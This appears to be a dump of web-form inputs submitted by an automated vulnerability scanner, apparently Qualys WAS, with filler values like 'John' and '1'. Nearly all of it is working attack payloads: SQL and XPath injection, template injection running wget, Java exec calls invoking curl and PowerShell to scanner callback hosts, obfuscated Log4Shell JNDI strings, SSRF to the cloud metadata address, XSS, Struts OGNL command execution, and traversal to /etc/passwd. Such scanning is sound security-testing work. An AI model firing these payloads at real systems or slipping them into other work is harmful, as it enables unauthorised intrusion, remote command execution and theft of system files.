John" and false() and "or" = "and
1
John" or true() or "and" = "and
1
John
1 and false() and 'or' = 'and'
John
1 or true() or 'and' = 'and'
John and false() and 'or' = 'and'
1
John or true() or 'and' = 'and'
1
John' or not(false()) or 'true' = 'true
1
John' or true() or 'and' = 'and
1
John
1' and 'tpklq'='xqlkp
John
1' or 'tpklq'='tpklq
John' /* or __Q_1__ */oR ' aND xqlkp'=' aND xqlkp
1
John' or 'tpklq'='tpklq
1
John') and 'swqtp'='ptqws
1
John') or 'swqtp'='swqtp
1
John aND 7248=2491 + 4757
1
John
1 /* or __Q_1__ */oR 4325=1597 + 2728 -- aND 2729
John
1') and 2634=1123 --
John
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('wget http://a0e364589f38978bea8dda4d20041840cadc94cc.1523145317359663.1872819839.oscomm15019101.oscomm.eu1.qualysperiscope.com.').read() }}
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('wget http://0896b3344642897dcf924fdcd3a6c94fa855c184.1523145317359663.4237911352.oscomm15019101.oscomm.eu1.qualysper
1
John
${script:javascript:java.lang.Runtime.getRuntime().exec('powershell -c iwr -uri https://0da81f561a46e3d7cafbe901743db6008bcb1b8b.1523145317359663.2021905764.oscomm27.oscomm.eu1.qualysperiscope.com.')}
${script:javascript:java.lang.Runtime.getRuntime().exec('powershell -c iwr -uri https://1168cd61f1d3f75ee88a3e9c65490dc38d5e1ad6.1523145317359663.159518285.oscomm27.oscomm.eu1.qualysperiscop
1
${script:javascript:java.lang.Runtime.getRuntime().exec('powershell -c iwr -uri https://fa73ba824b80b7358419f38ca80490534909d063.1523145317359663.2886684041.oscomm26.oscomm.eu1.qualysperisco
1
John
${url:UTF-8::https://e7b586ee1a98476299e143ac182ecce53c88105b.1523145317359663.3887713567.oscomm25.oscomm.eu1.qualysperiscope.com./}
${url:UTF-8::https://ca2f2f49e375d9faee1e18e23c146f1b70ab5405.1523145317359663.202458433.oscomm25.oscomm.eu1.qualysperiscope.com./}
1
John
${url:UTF-8::http://b82fecc500db5c97551b120fc873c47dc8d395cd.1523145317359663.2797838500.oscomm24.oscomm.eu1.qualysperiscope.com.}
${url:UTF-8::http://7124f272934b5b86082c688ea26a52bc29ea2f96.1523145317359663.486818309.oscomm24.oscomm.eu1.qualysperiscope.com.}
1
John
${url:UTF-8:https://2b764f4a0d123378d8055cefbe96229ab2027f76.1523145317359663.2368037417.oscomm23.oscomm.eu1.qualysperiscope.com.}
${url:UTF-8:https://4e96f8d8d6e250099300561a94009d442d6f87df.1523145317359663.3668452057.oscomm23.oscomm.eu1.qualysperiscope.com.}
1
John
${url:UTF-8:http://0d61a8f298f36aa8cae847ebc941613386a5cbc4.1523145317359663.122336536.oscomm22.oscomm.eu1.qualysperiscope.com.}
${url:UTF-8:http://e615613d171b78cf55cd5ac6fc85d268f4826448.1523145317359663.3613721860.oscomm22.oscomm.eu1.qualysperiscope.com.}
1
John
${dns:address|67fa2164f3f71c0173503685074e41438ea2d847.1523145317359663.3090613491.oscomm21.oscomm.eu1.qualysperiscope.com.}
${dns:address|f6b1ff3eadaa12de3f3c121fcab48aaa51fa438b.1523145317359663.1981007597.oscomm21.oscomm.eu1.qualysperiscope.com.}
1
John
${script:javascript:java.lang.Runtime.getRuntime().exec('curl http://f0be9cd073f99ad6029af8a31e70d19a9debb9f8.1523145317359663.3764464079.oscomm20.oscomm.eu1.qualysperiscope.com.')}
${script:javascript:java.lang.Runtime.getRuntime().exec('curl http://86999c96893f105b80d6ae36b984c38fa68c7669.1523145317359663.3013316236.oscomm20.oscomm.eu1.qualysperiscope.com.')}
1
John
${url:UTF-8:https://05847f3e79757d4b8ce4bb6a20449d56cc8eb647.1523145317359663.1777744348.oscomm19.oscomm.eu1.qualysperiscope.com./}
${url:UTF-8:https://8f935ddd9bc8fb64b001a0e063ed9c3806bfe086.1523145317359663.56850651.oscomm19.oscomm.eu1.qualysperiscope.com./}
1
John
${url:UTF-8:http://9b2ae72e84714163d7041d3a2eed75d46d6e8a27.1523145317359663.688345274.oscomm18.oscomm.eu1.qualysperiscope.com./}
${url:UTF-8:http://69e1a8123b882547431a5920598d7cea57514778.1523145317359663.1112557246.oscomm18.oscomm.eu1.qualysperiscope.com./}
1
John
${url:UTF-8::https://dfd82ac023d7b5fc00371335c3af775b84386359.1523145317359663.3384346302.oscomm17.oscomm.eu1.qualysperiscope.com./}
${url:UTF-8::https://2b10a066086726147f0711f974019e4b88cac36f.1523145317359663.2825403047.oscomm17.oscomm.eu1.qualysperiscope.com./}
1
John
${url:UTF-8::https://c6e1923750cb74e3e2ce57237b7b2cffa82d0f2b.1523145317359663.1617674705.oscomm16.oscomm.eu1.qualysperiscope.com./Qualyswas}
${url:UTF-8::https://011cab7ff7810bfbce1869a701b747fc5c6f93a2.1523145317359663.3826771601.oscomm16.oscomm.eu1.qualysperiscope.com./Qualyswas}
1
John
${script:javascript:java.lang.Runtime.getRuntime().exec('curl https://@CIPHER@.@UNIQUEID@.@URI@.oscomm15.oscomm.@DOMAIN@')}
${script:javascript:java.lang.Runtime.getRuntime().exec('curl https://@CIPHER@.@UNIQUEID@.@URI@.oscomm15.oscomm.@DOMAIN@')}
1
John
${script:javascript:java.lang.Runtime.getRuntime().exec('curl https://e7474bbe79808e20f122815b496de6b197371151.1523145317359663.2007344329.oscomm14.oscomm.eu1.qualysperiscope.com.')}
${script:javascript:java.lang.Runtime.getRuntime().exec('curl https://502458bdf6bc6e480acf999fee4a30cb7c6088a5.1523145317359663.1630880520.oscomm14.oscomm.eu1.qualysperiscope.com.')}
1
John
powershell -c iwr -uri https://@CIPHER@.@UNIQUEID@.@URI@.oscomm13.oscomm.@DOMAIN@
powershell -c iwr -uri https://@CIPHER@.@UNIQUEID@.@URI@.oscomm13.oscomm.@DOMAIN@
1
John
${script:javascript:java.lang.Runtime.getRuntime().exec('powershell -c iwr -uri https://6263c5b2ef40b7804bb1098671004d03ed44689a.1523145317359663.2286839542.oscomm12.oscomm.eu1.qualysperiscope.com.')}
John
powershell -c iwr -uri http://@CIPHER@.@UNIQUEID@.@URI@.oscomm11.oscomm.@DOMAIN@
powershell -c iwr -uri http://@CIPHER@.@UNIQUEID@.@URI@.oscomm11.oscomm.@DOMAIN@
1
John
${script:javascript:java.lang.Runtime.getRuntime().exec('powershell -c iwr -uri http://a5748278d2a1f4c13b7e85650c68876c1e14f1de.1523145317359663.2441055442.oscomm10.oscomm.eu1.qualysperiscope.com.')}
${script:javascript:java.lang.Runtime.getRuntime().exec('powershell -c iwr -uri http://fc92900e5acd621abbf8a748d6b5db39c67e5947.1523145317359663.1573529369.oscomm10.oscomm.eu1.qualysperiscop
1
John
${url:UTF-8:https://@CIPHER@.@UNIQUEID@.@URI@.oscomm09.oscomm.@DOMAIN@}
${url:UTF-8:https://@CIPHER@.@UNIQUEID@.@URI@.oscomm09.oscomm.@DOMAIN@}
1
John
${url:UTF-8:http://@CIPHER@.@UNIQUEID@.@URI@.oscomm08.oscomm.@DOMAIN@}
${url:UTF-8:http://@CIPHER@.@UNIQUEID@.@URI@.oscomm08.oscomm.@DOMAIN@}
1
John
${url:UTF-8:https://f3a77e378da0a3128f4b285d555fb563d11da45a.1523145317359663.1995767358.oscomm07.oscomm.eu1.qualysperiscope.com.}
${url:UTF-8:https://ddba21f33c7855ffad50a4a12b853f8506ab2c8f.1523145317359663.2656480023.oscomm07.oscomm.eu1.qualysperiscope.com.}
1
John
${url:UTF-8:http://e4bdf82508c3956975a1720add3885bf5a235c62.1523145317359663.869463722.oscomm06.oscomm.eu1.qualysperiscope.com.}
John
$%7Bdns:address%7C@CIPHER@.@UNIQUEID@.@URI@.oscomm05.oscomm.@DOMAIN@%7D
$%7Bdns:address%7C@CIPHER@.@UNIQUEID@.@URI@.oscomm05.oscomm.@DOMAIN@%7D
1
John
${dns:address|eed8fe372c4a043424b3867c9d38a814ec7c1535.1523145317359663.1457093420.oscomm04.oscomm.eu1.qualysperiscope.com.}
${dns:address|25e5f5da0c3d3bdfc1f745e3c9c8f260d8ec7d3e.1523145317359663.120711641.oscomm04.oscomm.eu1.qualysperiscope.com.}
1
John
${script:javascript:java.lang.Runtime.getRuntime().exec('curl http://@CIPHER@.@UNIQUEID@.@URI@.oscomm03.oscomm.@DOMAIN@')}
${script:javascript:java.lang.Runtime.getRuntime().exec('curl http://@CIPHER@.@UNIQUEID@.@URI@.oscomm03.oscomm.@DOMAIN@')}
1
John
${script:javascript:java.lang.Runtime.getRuntime().exec('curl http://ee6de8b98d32ce31c1f19eb21f737c3999562000.1523145317359663.3795509148.oscomm02.oscomm.eu1.qualysperiscope.com.')}
${script:javascript:java.lang.Runtime.getRuntime().exec('curl http://df7a77aa2584a536430dcac9f45ff636a0ac3f81.1523145317359663.213959754.oscomm02.oscomm.eu1.qualysperiscope.com.')}
1
John
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://9c261899e535657983a59c279a2de18ff8e60739.1523145317359663.884101388.log4j12.log4j.eu1.qualysperiscope.com./QualysWAS}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://b676f8e0ed1410fba54cea8a027aac2a78588624.1523145317359663.3410237247.log4j12.log4j.eu1.qualysperiscope.com./QualysWAS}
1
John
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://679fe8f9aae421633b05e5a063af9a37fe4f6dc1.1523145317359663.4065473924.log4j11.log4j.eu1.qualysperiscope.com./QualysWAS}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://09d987bc00c61c4e7a3782b962c074acb7e4c55d.1523145317359663.3280538587.log4j11.log4j.eu1.qualysperiscope.com./QualysWAS}
1
John
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//1b3125037900ce60454970742cf22e5109c1fd6b.1523145317359663.1271029463.log4j10.log4j.eu1.qualysperiscope.com./QualysWAS}
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//a6505c5543007d1e7614e5ae773ee8e1a81da167.1523145317359663.1625497673.log4j10.log4j.eu1.qualysperiscope.com./QualysWAS}
1
John
${jndi:dns://924ea46cf622739ba785740b873d8edb021bea3f.1523145317359663.1155268685.log4j09.log4j.eu1.qualysperiscope.com./QualysWAS}
${jndi:dns://2c570678a8732c552d4b8a5c4c675679eeed1a32.1523145317359663.2343291780.log4j09.log4j.eu1.qualysperiscope.com./QualysWAS}
1
John
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//aad6c66c493d6a3674c44fe31e5605408db6e612.1523145317359663.3170070127.log4j08.log4j.eu1.qualysperiscope.com./QualysWAS}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//44dabd58497edce4dc92b012e8ccb2ca3114497d.1523145317359663.544636816.log4j08.log4j.eu1.qualysperiscope.com./QualysWAS}
1
John
${jnd${123%ff:-${123%ff:-i:}}ldap://0835cfc7e3d3c7a758d4fe481acaa31bd88ba635.1523145317359663.3493693662.log4j07.log4j.eu1.qualysperiscope.com./QualysWAS}
${jnd${123%ff:-${123%ff:-i:}}ldap://6e5a9ae6f3f442c2ce842ddc704186299793b38d.1523145317359663.2406127967.log4j07.log4j.eu1.qualysperiscope.com./QualysWAS}
1
John
${j${::-n}di:ldap${::-:}//f87ebd990cde3072282e83a60db86a227f8237ad.1523145317359663.1710158108.log4j06.log4j.eu1.qualysperiscope.com./QualysWAS}
${j${::-n}di:ldap${::-:}//b390d9ccc51886852c7fbd2f396022bd2effa770.1523145317359663.2682141920.log4j06.log4j.eu1.qualysperiscope.com./QualysWAS}
1
John
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://c969cbaf9598f9c5918aadd7b458c094dfa49b2d.1523145317359663.2809206209.log4j05.log4j.eu1.qualysperiscope.com./QualysWAS}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://e6562c799b451c1572cf3d21a55d9441e80a04bb.1523145317359663.907044701.log4j05.log4j.eu1.qualysperiscope.com./QualysWAS}
1
John
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://f8a6643c0f4f6224a78fbe91ada3f864ce69e992.1523145317359663.1062401354.log4j04.log4j.eu1.qualysperiscope.com./QualysWAS}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://2d14ad9f6948bf5b15029e555bb38073008219d3.1523145317359663.137895838.log4j04.log4j.eu1.qualysperiscope.com./QualysWAS}
1
John
${jndi:rmi://eb31997ecf8d64f2533ee8c3eda88a968021ff63.1523145317359663.2178349668.log4j03.log4j.eu1.qualysperiscope.com./QualysWAS}
John
${jndi:ldap://3a11a332570ed3cc3dc1b10abebc7a515629d6d5.1523145317359663.941521998.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS}
${jndi:ldap://6b0ba0f50f51c8fbd3f2d897f63dde0eff96cc3b.1523145317359663.884274828.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS}
1
ping -c 2 b7c12f313fc1b9e01eb5a9c259bc8b5b6a762e13.1523145317359663.4166643789.oscomm01.oscomm.eu1.qualysperiscope.com.
1
John
http://2ea6710d82fb9e311733f12179f56242b72da341.1523145317359663.2708986990.ssrf01.ssrf.eu1.qualysperiscope.com.
http://8eaa5101b4c8d496023f47849bf0c070b89c4e59.1523145317359663.3956953710.ssrf01.ssrf.eu1.qualysperiscope.com.
1
John
Joe+
bcc:was_engine@f19d3c600321dcce2edde129faa720ba05aaf4ab.1523145317359663.1037769574.smtphi01.smtp.eu1.qualysperiscope.com.
John
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/
1
John
</script><script>function(){qxssczvZVNZY};</script>
</script><script>function(){qxssg1sE51Te};</script>
1
John
<!--#config timefmt="<%A><%B><%d><%Y>" -->qualyswas:<!--#echo var="DATE_LOCAL" -->
<!--#config timefmt="<%A><%B><%d><%Y>" -->qualyswas:<!--#echo var="DATE_LOCAL" -->
1
John
;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/}
/*
#set($value=23.0231*213.759)
$value
*/
;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/}
/*
#set($value=23.0231*213.759)
$value
*/
1
John
{23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}}
John
|aaaa
=(23.0231*213.759)
|${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}<%= 23.0231*213.759 %>
|aaaa
=(23.0231*213.759)
|${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}<%= 23.0231*213.759 %>
1
John
*/;(function(){qxss63ekgbFk});/*
*/;(function(){qxss4Ua72M14});/*
1
John
9
;(function(){qxssXys877fy});//
9
;(function(){qxssFvz0g8g3});//
1
9;(function(){qxssSpk4cQyA});//
1
John
';(function(){qxssk5SULyXR});/**/'
';(function(){qxssS3NZuwcS});/**/'
1
John
qualys(aqxssWST5B6mr)xyz
qualys(aqxss5GJc9X6i)xyz
1
John
");(function(){qxssqZXgJ7lP});/**/"
");(function(){qxss35NCW081});/**/"
1
John
";(function(){qxss4Nsqo6xG});/**/"
";(function(){qxssbU5ZVb58});/**/"
1
John
javascript:qxss(X154405448Y7_2Z);
javascript:qxss(X154405448Y1_2Z);
1
John
a(){}phpinfo(); function a
a(){}phpinfo(); function a
1
John
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstan
1
John
%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#
1
John
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#og
1
John
../../../../../../../Windows/System32/drivers/etc/hosts
../../../../../../../Windows/System32/drivers/etc/hosts
1
John
../../../../../../../Windows/System32/drivers/etc/hosts
../../../../../../../Windows/System32/drivers/etc/hosts
1
John
//....//....//....//....//....//....//....//etc/passwd
//....//....//....//....//....//....//....//etc/passwd
1
//..//..//..//..//..//..//..//etc/passwd
1
John
../../../../../../../etc/passwd
../../../../../../../etc/passwd
1
John
/../../../../../../../etc/passwd
/../../../../../../../etc/passwd
1
John
/../../../../../../../etc/passwd
/../../../../../../../etc/passwd
1